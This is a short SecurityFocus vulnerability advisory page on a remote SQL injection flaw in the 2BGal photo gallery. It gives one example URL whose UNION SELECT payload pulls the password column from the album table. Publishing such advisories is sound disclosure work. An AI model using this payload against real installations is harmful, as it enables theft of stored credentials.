info
discussion
exploit
solution
references
2BGal Remote SQL Injection Vulnerability
The following example is available:
http://www.example.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%20passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201; --
Privacy Statement
Copyright 2010, SecurityFocus
